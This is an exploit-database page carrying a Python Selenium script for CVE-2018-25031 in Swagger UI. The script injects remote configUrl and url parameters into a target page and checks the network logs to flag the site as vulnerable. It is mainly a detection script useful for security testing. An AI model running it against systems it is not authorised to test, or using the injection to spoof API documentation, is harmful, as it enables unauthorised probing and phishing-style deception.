Share
## https://sploitus.com/exploit?id=PACKETSTORM:171941
# Exploit Title: Swagger UI 4.1.3 - User Interface (UI) Misrepresentation of Critical Information  
# Date: 14 April, 2023  
# Exploit Author: Rafael Cintra Lopes  
# Vendor Homepage: https://swagger.io/  
# Version: < 4.1.3  
# CVE: CVE-2018-25031  
# Site: https://rafaelcintralopes.com.br/  
  
# Usage: python swagger-exploit.py https://[swagger-page].com  
  
from selenium import webdriver  
from selenium.webdriver.common.desired_capabilities import DesiredCapabilities  
from selenium.webdriver.chrome.service import Service  
import time  
import json  
import sys  
  
if __name__ == "__main__":  
  
target = sys.argv[1]  
  
desired_capabilities = DesiredCapabilities.CHROME  
desired_capabilities["goog:loggingPrefs"] = {"performance": "ALL"}  
  
options = webdriver.ChromeOptions()  
options.add_argument("--headless")  
options.add_argument("--ignore-certificate-errors")  
options.add_argument("--log-level=3")  
options.add_experimental_option("excludeSwitches", ["enable-logging"])  
  
# Browser webdriver path  
drive_service = Service("C:/chromedriver.exe")  
  
driver = webdriver.Chrome(service=drive_service,  
options=options,  
desired_capabilities=desired_capabilities)  
  
driver.get(target+"?configUrl=https://petstore.swagger.io/v2/hacked1.json")  
time.sleep(10)  
driver.get(target+"?url=https://petstore.swagger.io/v2/hacked2.json")  
time.sleep(10)  
  
logs = driver.get_log("performance")  
  
with open("log_file.json", "w", encoding="utf-8") as f:  
f.write("[")  
  
for log in logs:  
log_file = json.loads(log["message"])["message"]  
  
if("Network.response" in log_file["method"]  
or "Network.request" in log_file["method"]  
or "Network.webSocket" in log_file["method"]):  
  
f.write(json.dumps(log_file)+",")  
f.write("{}]")  
  
driver.quit()  
  
json_file_path = "log_file.json"  
with open(json_file_path, "r", encoding="utf-8") as f:  
logs = json.loads(f.read())  
  
for log in logs:  
try:  
url = log["params"]["request"]["url"]  
  
if(url == "https://petstore.swagger.io/v2/hacked1.json"):  
print("[Possibly Vulnerable] " + target + "?configUrl=https://petstore.swagger.io/v2/swagger.json")  
  
if(url == "https://petstore.swagger.io/v2/hacked2.json"):  
print("[Possibly Vulnerable] " + target + "?url=https://petstore.swagger.io/v2/swagger.json")  
  
except Exception as e:  
pass